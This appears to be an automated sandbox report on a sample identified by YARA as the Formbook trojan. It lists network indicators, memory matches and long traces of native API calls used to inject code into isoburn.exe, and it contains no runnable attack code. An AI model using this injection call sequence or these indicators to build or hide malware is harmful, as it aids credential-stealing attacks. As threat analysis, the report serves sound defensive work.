            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Sat, 02 Dec 2023 17:50:43 GMT | Server: Apache | X-Powered-By: PHP/7.4.33 | Expires: Wed, 11 Jan 1984 05:00:00 GMT | Cache-Control: no-cache, must-revalidate, max-age=0 | Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/" | Upgrade: h2,h2c | Connection: Upgrade, close | Transfer-Encoding: chunked | Content-Type: text/html; charset=UTF-8
            Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?utm_source=&utm_medium=expired&utm_campaign
            Source: isoburn.exe, 00000005.00000002.4476014647.0000000005C4C000.00000004.10000000.00040000.00000000.sdmp, AQhPMwWbqUlSTgiqGOPNvqG.exe, 00000007.00000002.4475114497.000000000332C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/check_site?utm_source=&utm_medium=expired&utm_campaign
            Source: unknown DNS traffic detected: queries for: www.alldaysslimmingstea.com

            E-Banking Fraud

            Source: Yara match File source: 3.2.PO_CCTEB77.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 3.2.PO_CCTEB77.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.2154955744.0000000001730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.4474939191.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.4479415286.0000000004DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.4475032057.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.4475055510.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.2155764463.0000000002560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 3.2.PO_CCTEB77.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 3.2.PO_CCTEB77.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4473974676.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2154955744.0000000001730000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4474939191.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4479415286.0000000004DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4475032057.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4475055510.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2155764463.0000000002560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sample Static PE information: Filename: PO_CCTEB77.exe
            Source: 0.2.PO_CCTEB77.exe.3221438.1.raw.unpack, -Module-.cs Large array initialization: _200F_206E_202A_202D_206F_206B_202A_202D_206D_200F_206F_200E_202A_200C_200C_206C_202D_206F_202E_206D_200E_206D_200E_200F_202B_202B_200F_200E_200C_206D_202A_202A_202D_200F_202E_202B_202C_202A_200C_200F_202E: array initializer size 2192
            Source: 0.2.PO_CCTEB77.exe.86f0000.10.raw.unpack, -Module-.cs Large array initialization: _200F_206E_202A_202D_206F_206B_202A_202D_206D_200F_206F_200E_202A_200C_200C_206C_202D_206F_202E_206D_200E_206D_200E_200F_202B_202B_200F_200E_200C_206D_202A_202A_202D_200F_202E_202B_202C_202A_200C_200F_202E: array initializer size 2192
            Source: PO_CCTEB77.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 3.2.PO_CCTEB77.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01815AA03_2_01815AA0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0186DAAC3_2_0186DAAC
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0187DAC63_2_0187DAC6
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188FA493_2_0188FA49
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01887A463_2_01887A46
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01843A6C3_2_01843A6C
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D3D403_2_017D3D40
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EFDC03_2_017EFDC0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01881D5A3_2_01881D5A
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01887D733_2_01887D73
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188FCF23_2_0188FCF2
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01849C323_2_01849C32
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188FFB13_2_0188FFB1
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188FF093_2_0188FF09
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D1F923_2_017D1F92
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D9EB03_2_017D9EB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B05355_2_050B0535
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051705915_2_05170591
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051544205_2_05154420
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051624465_2_05162446
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0515E4F65_2_0515E4F6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050D47505_2_050D4750
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B07705_2_050B0770
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050AC7C05_2_050AC7C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050CC6E05_2_050CC6E0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050A01005_2_050A0100
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0514A1185_2_0514A118
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051381585_2_05138158
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051701AA5_2_051701AA
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051681CC5_2_051681CC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051420005_2_05142000
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516A3525_2_0516A352
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051703E65_2_051703E6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050BE3F05_2_050BE3F0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051502745_2_05150274
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051302C05_2_051302C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050BAD005_2_050BAD00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0514CD1F5_2_0514CD1F
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050C8DBF5_2_050C8DBF
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050AADE05_2_050AADE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B0C005_2_050B0C00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_05150CB55_2_05150CB5
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050A0CF25_2_050A0CF2
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_05152F305_2_05152F30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050F2F285_2_050F2F28
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050D0F305_2_050D0F30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_05124F405_2_05124F40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0512EFA05_2_0512EFA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050A2FC85_2_050A2FC8
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050BCFE05_2_050BCFE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516EE265_2_0516EE26
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B0E595_2_050B0E59
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516CE935_2_0516CE93
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050C2E905_2_050C2E90
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516EEDB5_2_0516EEDB
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050C69625_2_050C6962
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B29A05_2_050B29A0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0517A9A65_2_0517A9A6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050BA8405_2_050BA840
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B28405_2_050B2840
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050968B85_2_050968B8
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050DE8F05_2_050DE8F0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516AB405_2_0516AB40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_05166BD75_2_05166BD7
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050AEA805_2_050AEA80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051675715_2_05167571
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0514D5B05_2_0514D5B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516F43F5_2_0516F43F
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050A14605_2_050A1460
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516F7B05_2_0516F7B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051616CC5_2_051616CC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E516C5_2_050E516C
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0509F1725_2_0509F172
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0517B16B5_2_0517B16B
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050BB1B05_2_050BB1B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B70C05_2_050B70C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0515F0CC5_2_0515F0CC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516F0E05_2_0516F0E0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051670E95_2_051670E9
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516132D5_2_0516132D
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0509D34C5_2_0509D34C
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050F739A5_2_050F739A
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B52A05_2_050B52A0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050CB2C05_2_050CB2C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051512ED5_2_051512ED
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B3D405_2_050B3D40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_05161D5A5_2_05161D5A
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_05167D735_2_05167D73
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050CFDC05_2_050CFDC0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_05129C325_2_05129C32
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516FCF25_2_0516FCF2
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516FF095_2_0516FF09
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B1F925_2_050B1F92
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516FFB15_2_0516FFB1
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B9EB05_2_050B9EB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051459105_2_05145910
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B99505_2_050B9950
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050CB9505_2_050CB950
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0511D8005_2_0511D800
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B38E05_2_050B38E0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516FB765_2_0516FB76
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050CFB805_2_050CFB80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_05125BF05_2_05125BF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050EDBF95_2_050EDBF9
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_05167A465_2_05167A46
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516FA495_2_0516FA49
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_05123A6C5_2_05123A6C
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050F5AA05_2_050F5AA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_05151AA35_2_05151AA3
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0514DAAC5_2_0514DAAC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0515DAC65_2_0515DAC6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_03011A105_2_03011A10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0300CE605_2_0300CE60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0300AEE05_2_0300AEE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0300CC375_2_0300CC37
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0300CC405_2_0300CC40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0301316B5_2_0301316B
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_030131705_2_03013170
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_030275105_2_03027510
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: String function: 017BB970 appears 275 times
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: String function: 01817E54 appears 100 times
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: String function: 01805130 appears 56 times
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: String function: 0183EA12 appears 86 times
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: String function: 0184F290 appears 105 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0509B970 appears 278 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 050E5130 appears 58 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0511EA12 appears 86 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0512F290 appears 105 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 050F7E54 appears 102 times
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0040A953 NtMapViewOfSection,3_2_0040A953
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0040A123 NtSetContextThread,3_2_0040A123
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0040B213 NtDelayExecution,3_2_0040B213
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0040AB73 NtCreateFile,3_2_0040AB73
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0040A323 NtResumeThread,3_2_0040A323
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_00428453 NtClose,3_2_00428453
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_00409D23 NtSuspendThread,3_2_00409D23
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0040ADA3 NtReadFile,3_2_0040ADA3
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0040B623 NtAllocateVirtualMemory,3_2_0040B623
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_00409F23 NtGetContextThread,3_2_00409F23
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0040A733 NtCreateSection,3_2_0040A733
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802B60 NtClose,LdrInitializeThunk,3_2_01802B60
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01802DF0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01802C70
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018035C0 NtCreateMutant,LdrInitializeThunk,3_2_018035C0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01804340 NtSetContextThread,3_2_01804340
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01804650 NtSuspendThread,3_2_01804650
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802B80 NtQueryInformationFile,3_2_01802B80
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802BA0 NtEnumerateValueKey,3_2_01802BA0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802BE0 NtQueryValueKey,3_2_01802BE0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802BF0 NtAllocateVirtualMemory,3_2_01802BF0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802AB0 NtWaitForSingleObject,3_2_01802AB0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802AD0 NtReadFile,3_2_01802AD0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802AF0 NtWriteFile,3_2_01802AF0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802DB0 NtEnumerateKey,3_2_01802DB0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802DD0 NtDelayExecution,3_2_01802DD0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802D00 NtSetInformationFile,3_2_01802D00
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802D10 NtMapViewOfSection,3_2_01802D10
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802D30 NtUnmapViewOfSection,3_2_01802D30
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802CA0 NtQueryInformationToken,3_2_01802CA0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802CC0 NtQueryVirtualMemory,3_2_01802CC0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802CF0 NtOpenProcess,3_2_01802CF0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802C00 NtQueryInformationProcess,3_2_01802C00
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802C60 NtCreateKey,3_2_01802C60
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802F90 NtProtectVirtualMemory,3_2_01802F90
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802FA0 NtQuerySection,3_2_01802FA0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802FB0 NtResumeThread,3_2_01802FB0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802FE0 NtCreateFile,3_2_01802FE0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802F30 NtCreateSection,3_2_01802F30
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802F60 NtCreateProcessEx,3_2_01802F60
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802E80 NtReadVirtualMemory,3_2_01802E80
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802EA0 NtAdjustPrivilegesToken,3_2_01802EA0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802EE0 NtQueueApcThread,3_2_01802EE0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802E30 NtWriteVirtualMemory,3_2_01802E30
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01803090 NtSetValueKey,3_2_01803090
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01803010 NtOpenDirectoryObject,3_2_01803010
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018039B0 NtGetContextThread,3_2_018039B0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01803D10 NtOpenProcessToken,3_2_01803D10
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01803D70 NtOpenThread,3_2_01803D70
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E4650 NtSuspendThread,LdrInitializeThunk,5_2_050E4650
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E4340 NtSetContextThread,LdrInitializeThunk,5_2_050E4340
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_050E2D10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_050E2D30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2DD0 NtDelayExecution,LdrInitializeThunk,5_2_050E2DD0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_050E2DF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2C60 NtCreateKey,LdrInitializeThunk,5_2_050E2C60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_050E2C70
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_050E2CA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2F30 NtCreateSection,LdrInitializeThunk,5_2_050E2F30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2FB0 NtResumeThread,LdrInitializeThunk,5_2_050E2FB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2FE0 NtCreateFile,LdrInitializeThunk,5_2_050E2FE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_050E2E80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_050E2EE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2B60 NtClose,LdrInitializeThunk,5_2_050E2B60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_050E2BA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_050E2BE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_050E2BF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2AD0 NtReadFile,LdrInitializeThunk,5_2_050E2AD0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2AF0 NtWriteFile,LdrInitializeThunk,5_2_050E2AF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E35C0 NtCreateMutant,LdrInitializeThunk,5_2_050E35C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E39B0 NtGetContextThread,LdrInitializeThunk,5_2_050E39B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2D00 NtSetInformationFile,5_2_050E2D00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2DB0 NtEnumerateKey,5_2_050E2DB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2C00 NtQueryInformationProcess,5_2_050E2C00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2CC0 NtQueryVirtualMemory,5_2_050E2CC0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2CF0 NtOpenProcess,5_2_050E2CF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2F60 NtCreateProcessEx,5_2_050E2F60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2F90 NtProtectVirtualMemory,5_2_050E2F90
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2FA0 NtQuerySection,5_2_050E2FA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2E30 NtWriteVirtualMemory,5_2_050E2E30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2EA0 NtAdjustPrivilegesToken,5_2_050E2EA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2B80 NtQueryInformationFile,5_2_050E2B80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E2AB0 NtWaitForSingleObject,5_2_050E2AB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E3010 NtOpenDirectoryObject,5_2_050E3010
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E3090 NtSetValueKey,5_2_050E3090
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E3D10 NtOpenProcessToken,5_2_050E3D10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E3D70 NtOpenThread,5_2_050E3D70
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_03024F10 NtCreateFile,5_2_03024F10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_030252C0 NtAllocateVirtualMemory,5_2_030252C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_03025100 NtDeleteFile,5_2_03025100
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_03025180 NtClose,5_2_03025180
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_03025040 NtReadFile,5_2_03025040
